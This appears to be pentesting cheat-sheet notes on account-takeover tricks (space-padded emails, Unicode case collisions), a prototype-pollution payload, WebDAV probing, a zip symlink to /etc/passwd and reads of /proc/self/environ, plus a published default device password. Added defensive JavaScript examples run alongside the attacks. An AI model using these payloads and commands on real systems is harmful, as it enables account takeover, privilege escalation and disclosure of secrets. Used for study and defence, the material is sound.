1. While registering an account, try appending a space to the end of an already registered email to attempt an account takeover (the database strips the trailing space on insert, but the application's uniqueness check does not).
2. If the email field has a fixed maximum length and characters beyond it are stripped, try registering an email padded with spaces up to the maximum length plus any character at the end, e.g. <admin@htb.com #>.
Some Unicode characters collide with English letters when their case is changed. This can be used against functionality such as a Forgot Password flow that validates the input against the lowercase/uppercase value on file but sends the email to the address that was supplied.
// https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
# uppercase scenario (Python)
chr(0x017f).upper() == 'S'   # returns True (U+017F LATIN SMALL LETTER LONG S)
chr(0x0131).upper() == 'I'   # returns True (U+0131 LATIN SMALL LETTER DOTLESS I)
# lowercase scenario
chr(0x212A).lower() == 'k'   # returns True (U+212A KELVIN SIGN)
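The three lookalike cases above (trailing whitespace, silent truncation at a fixed column width, and Unicode case-folding collisions) all come down to the application comparing one form of the address while storing or mailing another. The following is an added example, not code from the original notes, showing the naive comparison being fooled by a dotless i and a canonicalisation routine that closes all three cases. MAX_EMAIL_LENGTH, the account list and the helper names are assumptions; lowercasing the local part is also an assumption (most providers treat it as case-insensitive).

```javascript
// Assumed column width for the stored address; any input longer than this is
// rejected outright instead of being truncated by the database layer.
const MAX_EMAIL_LENGTH = 254;

// Naive comparison the notes describe: case-insensitive match by upper-casing.
// '\u0131' (dotless i) upper-cases to ASCII 'I', so it collides with "admin".
// The lowercase twin is '\u212a' (KELVIN SIGN), which lower-cases to 'k'.
function naiveMatch(stored, provided) {
  return stored.toUpperCase() === provided.toUpperCase();
}

// Canonical form used for every comparison and lookup. Rejects instead of
// "fixing" the input, because a trimmed or truncated value is exactly what
// lets a second registration collide with an existing account.
function canonicalEmail(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  if (input !== input.trim()) return { ok: false, reason: 'leading or trailing whitespace' };
  if (input.length > MAX_EMAIL_LENGTH) return { ok: false, reason: 'exceeds maximum length' };
  // Printable ASCII only: ASCII case mapping is a bijection, so no other
  // character can fold onto the same stored value.
  if (!/^[\x21-\x7e]+$/.test(input)) return { ok: false, reason: 'non-ASCII or control character' };
  const at = input.lastIndexOf('@');
  if (at < 1 || at === input.length - 1) return { ok: false, reason: 'malformed address' };
  return { ok: true, email: input.toLowerCase() };
}

// Constructed sample account table (assumption, not real data).
const SAMPLE_ACCOUNTS = [
  { email: 'admin@example.com' },
  { email: 'Alice@Example.com' },
];

// Password-reset lookup: returns the address ON FILE that the mail must go to,
// never the user-supplied string, even when the two compare equal.
function resetTarget(provided, accounts) {
  const c = canonicalEmail(provided);
  if (!c.ok) return null;
  const account = accounts.find((a) => canonicalEmail(a.email).email === c.email);
  return account ? account.email : null;
}
```

The same canonicalEmail result should be the value checked for uniqueness at registration, so that "admin@example.com " and the padded "admin@example.com          #" are rejected before they ever reach the database.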
Using this bug, we can set new properties on objects. E.g. we can give the JSON object {"user":"test"} a new property admin=true if the server takes JSON data and sets attributes from it.
payload: {"user":"test","__proto__":{"admin":true}}
a = {}
b = 1
c = 'ds'
// polluting the prototype: a.__proto__ is Object.prototype, shared by everything
a.__proto__.foo = 'bar'
// all objects (and primitives, via their boxed prototypes) now have a foo property with value bar
d = new Object()
d.foo == 'bar'  // true
b.foo == 'bar'  // true, Number.prototype inherits from Object.prototype
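To see how the payload above lands on a server, here is an added example (not code from the original notes) with the merge pattern the notes describe, the pollution it causes when fed the page's payload, and a hardened merge that refuses to walk into the prototype chain. The function names, the check on ({}).admin and the clean-up step are assumptions made for the demonstration.

```javascript
// Payload from the notes: JSON.parse creates an OWN property named "__proto__",
// so Object.keys() returns it and a naive merge walks straight into it.
const PAYLOAD = '{"user":"test","__proto__":{"admin":true}}';

// Vulnerable pattern: copy request JSON onto a server-side object, recursing
// into nested objects. target["__proto__"] resolves to Object.prototype, so the
// recursive call sets Object.prototype.admin = true for every object alive.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: skip the keys that reach the prototype chain, and only
// descend into properties the target itself OWNS (never an inherited one).
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      if (!hasOwn(target, key) || typeof target[key] !== 'object' || target[key] === null) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs one merge against a fresh object and reports whether an unrelated,
// freshly created object gained an "admin" property. Restores the runtime
// afterwards so the check can be repeated.
function pollutionObserved(mergeFn) {
  const before = ({}).admin;               // undefined on a clean runtime
  mergeFn({}, JSON.parse(PAYLOAD));
  const after = ({}).admin;                // true if Object.prototype was polluted
  delete Object.prototype.admin;           // clean up
  return { before, after };
}
```

A typical authorization check such as `if (user.admin)` on any object, not just the one that was merged into, passes once `after` is true; the hardened merge keeps `after` undefined while still applying the legitimate "user" key.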
curl -X PUT http://192.168.14.129/dav/test.txt # check whether the DAV share accepts PUT (201/204 = writable)
cadaver http://target/dav # interactive WebDAV client (ls, get, put)
cat /proc/version
cat /etc/issue
cat /proc/self/environ
cat /proc/net/tcp # all TCP sockets (hex addresses/ports); state 0A = LISTEN
cat /proc/net/udp # all UDP sockets (hex addresses/ports)
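The /proc/net/tcp and /proc/net/udp files are not human-readable as-is: addresses and ports are hex, the IPv4 address is in host byte order (so reversed on x86), and the state column is a kernel enum. Below is an added decoder, not part of the original notes, run over a constructed sample of the file; it works for the udp file too, where bound sockets show state 07. The sample lines and the function names are assumptions.

```javascript
// Kernel TCP state codes as they appear in column "st" (include/net/tcp_states.h).
const TCP_STATES = {
  '01': 'ESTABLISHED', '02': 'SYN_SENT', '03': 'SYN_RECV', '04': 'FIN_WAIT1',
  '05': 'FIN_WAIT2', '06': 'TIME_WAIT', '07': 'CLOSE', '08': 'CLOSE_WAIT',
  '09': 'LAST_ACK', '0A': 'LISTEN', '0B': 'CLOSING',
};

// "0100007F:1F90" -> "127.0.0.1:8080". The address is written as a host-order
// 32-bit value, so on little-endian hosts (x86, most ARM) the octets are reversed.
function decodeHexAddr(field) {
  const [ip, port] = field.split(':');
  const octets = [];
  for (let i = 6; i >= 0; i -= 2) octets.push(parseInt(ip.slice(i, i + 2), 16));
  return `${octets.join('.')}:${parseInt(port, 16)}`;
}

// Parse the whole file. Columns: sl local rem st tx:rx tr:when retrnsmt uid timeout inode ...
function parseProcNetTcp(text) {
  const rows = [];
  for (const line of text.split('\n').slice(1)) {   // first line is the header
    const f = line.trim().split(/\s+/);
    if (f.length < 8) continue;
    rows.push({
      local: decodeHexAddr(f[1]),
      remote: decodeHexAddr(f[2]),
      state: TCP_STATES[f[3]] || f[3],
      uid: parseInt(f[7], 10),
    });
  }
  return rows;
}

// Convenience view: only the local endpoints that are listening.
function listeningSockets(text) {
  return parseProcNetTcp(text).filter((r) => r.state === 'LISTEN').map((r) => r.local);
}

// Constructed sample of /proc/net/tcp (assumption, not captured from a real host).
const SAMPLE_PROC_NET_TCP = [
  '  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode',
  '   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18392 1 0000000000000000 100 0 0 10 0',
  '   1: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 24117 1 0000000000000000 100 0 0 10 0',
  '   2: 0E01A8C0:D2A4 0100000A:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 26550 1 0000000000000000 20 4 30 10 -1',
].join('\n');
```

On a real host, `parseProcNetTcp(require('fs').readFileSync('/proc/net/tcp', 'utf8'))` gives the same view without needing ss or netstat on the box; the uid column tells you which account owns each socket, and the inode can be matched against /proc/*/fd to find the owning process.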
-
Windows Device Portal - port 8080
Windows IoT Core devices ship with a special web server called the Device Portal. Windows Device Portal runs on port 8080 in Development mode and has the default credentials Administrator / p@ssw0rd (with a zero).
RCE can be achieved via the vulnerability in the Sirep/WPCon communication protocol included with the Windows IoT operating system.
// git clone the repo https://github.com/SafeBreach-Labs/SirepRAT
-
CallStranger (CVE-2020-12695) Vulnerability - port 37215
The CallStranger vulnerability is caused by the Callback header value of the UPnP SUBSCRIBE function being controllable by an attacker, which enables an SSRF-like vulnerability.
// git clone the repo https://github.com/yunuscadirci/CallStranger
If zip files can be uploaded and their extracted content is accessible afterwards, try to reach local files through a symlink placed inside the archive.
mkdir test
cd test
ln -s /etc/passwd link.txt
cat link.txt # prints content of /etc/passwd
zip --symlinks -r test.zip test/
unzip -l test.zip
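The defence against the archive above is to inspect entries before extraction rather than after: a `zip --symlinks` entry is marked as a symlink in the Unix mode bits stored in the central directory, so an upload handler can reject it without ever creating the link. The following is an added example, not code from the original notes, that builds a small constructed archive of the same shape and scans its central directory for symlink entries. It uses only Node's Buffer; buildZip, findSymlinkEntries and the sample entry names are assumptions.

```javascript
// CRC-32 (IEEE) so the constructed archive is a valid zip, not just a lookalike.
function crc32(buf) {
  let crc = 0xffffffff;
  for (const byte of buf) {
    crc ^= byte;
    for (let k = 0; k < 8; k++) crc = (crc >>> 1) ^ (0xedb88320 & -(crc & 1));
  }
  return (crc ^ 0xffffffff) >>> 0;
}

// Build a stored (uncompressed) zip. Each entry carries a Unix mode; the Unix
// mode bits are what `zip --symlinks` writes into the external attributes.
function buildZip(entries) {
  const locals = [], centrals = [];
  let offset = 0;
  for (const e of entries) {
    const name = Buffer.from(e.name, 'utf8');
    const data = Buffer.from(e.data, 'utf8');   // for a symlink, the link target
    const crc = crc32(data);
    const local = Buffer.alloc(30);
    local.writeUInt32LE(0x04034b50, 0);         // local file header signature
    local.writeUInt16LE(20, 4);                 // version needed to extract
    local.writeUInt32LE(crc, 14);
    local.writeUInt32LE(data.length, 18);       // compressed size (stored)
    local.writeUInt32LE(data.length, 22);       // uncompressed size
    local.writeUInt16LE(name.length, 26);
    const central = Buffer.alloc(46);
    central.writeUInt32LE(0x02014b50, 0);       // central directory header signature
    central.writeUInt16LE(0x0314, 4);           // version made by: host 3 = Unix
    central.writeUInt16LE(20, 6);
    central.writeUInt32LE(crc, 16);
    central.writeUInt32LE(data.length, 20);
    central.writeUInt32LE(data.length, 24);
    central.writeUInt16LE(name.length, 28);
    central.writeUInt32LE((e.mode << 16) >>> 0, 38);   // external attributes: mode in high 16 bits
    central.writeUInt32LE(offset, 42);          // offset of local header
    locals.push(local, name, data);
    centrals.push(central, name);
    offset += local.length + name.length + data.length;
  }
  const cd = Buffer.concat(centrals);
  const eocd = Buffer.alloc(22);
  eocd.writeUInt32LE(0x06054b50, 0);            // end of central directory signature
  eocd.writeUInt16LE(entries.length, 8);
  eocd.writeUInt16LE(entries.length, 10);
  eocd.writeUInt32LE(cd.length, 12);
  eocd.writeUInt32LE(offset, 16);               // start of central directory
  return Buffer.concat([...locals, cd, eocd]);
}

// Scan the central directory and return the names of all symlink entries.
// Only entries whose "version made by" host is Unix (3) carry mode bits; for
// other hosts the high 16 bits of the external attributes mean something else.
function findSymlinkEntries(zip) {
  let eocd = -1;
  for (let i = zip.length - 22; i >= Math.max(0, zip.length - 22 - 0xffff); i--) {
    if (zip.readUInt32LE(i) === 0x06054b50) { eocd = i; break; }   // may follow a comment
  }
  if (eocd < 0) throw new Error('not a zip archive: EOCD record missing');
  const count = zip.readUInt16LE(eocd + 10);
  let pos = zip.readUInt32LE(eocd + 16);
  const flagged = [];
  for (let n = 0; n < count; n++) {
    if (zip.readUInt32LE(pos) !== 0x02014b50) throw new Error('corrupt central directory');
    const hostOs = zip.readUInt8(pos + 5);
    const nameLen = zip.readUInt16LE(pos + 28);
    const extraLen = zip.readUInt16LE(pos + 30);
    const commentLen = zip.readUInt16LE(pos + 32);
    const externalAttr = zip.readUInt32LE(pos + 38);
    const name = zip.toString('utf8', pos + 46, pos + 46 + nameLen);
    const mode = hostOs === 3 ? externalAttr >>> 16 : 0;
    if ((mode & 0xf000) === 0xa000) flagged.push(name);   // S_IFLNK
    pos += 46 + nameLen + extraLen + commentLen;
  }
  return flagged;
}

// Constructed sample: one regular file plus a symlink to /etc/passwd, the
// shape the `zip --symlinks -r test.zip test/` command above produces.
const SAMPLE_ZIP = buildZip([
  { name: 'test/readme.txt', data: 'hello', mode: 0o100644 },
  { name: 'test/link.txt', data: '/etc/passwd', mode: 0o120777 },
]);
```

An upload handler that calls findSymlinkEntries and rejects any archive with a non-empty result never creates the link, which is cheaper and safer than trying to filter what the link points at; extracting with a library that ignores symlink mode bits and writes the target path as plain file content is the other acceptable behaviour.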